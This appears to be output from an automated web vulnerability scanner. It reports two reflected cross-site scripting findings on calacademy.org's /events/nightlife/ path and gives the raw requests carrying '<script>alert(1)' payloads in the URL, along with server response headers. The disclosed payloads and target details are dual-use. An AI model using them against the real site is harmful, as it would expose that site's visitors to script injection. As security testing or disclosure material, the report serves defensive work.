1. Cross-site scripting (reflected)
1.1. http://www.calacademy.org/events/nightlife/ [REST URL parameter 1]
1.2. http://www.calacademy.org/events/nightlife/ [REST URL parameter 2]
Severity: | High |
Confidence: | Certain |
Host: | http://www.calacademy.org |
Path: | /events/nightlife/ |
GET /events29b7f"><script>alert(1)< Host: www.calacademy.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Sun, 19 Dec 2010 13:16:10 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7l PHP/5.3.0 X-Powered-By: PHP/5.3.0 Set-Cookie: PHPSESSID=a8ea8ff394 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache MS-Author-Via: DAV Connection: close Content-Type: text/html Content-Length: 45083 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!-- Begin /include/defaul ...[SNIP]... <a href="/page_not_found.php ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.calacademy.org |
Path: | /events/nightlife/ |
GET /events/nightlifec7073"><script>alert(1)< Host: www.calacademy.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Sun, 19 Dec 2010 13:16:11 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7l PHP/5.3.0 X-Powered-By: PHP/5.3.0 Set-Cookie: PHPSESSID=d00bdb3dc9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache MS-Author-Via: DAV Connection: close Content-Type: text/html Content-Length: 45083 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!-- Begin /include/defaul ...[SNIP]... <a href="/page_not_found.php ...[SNIP]... |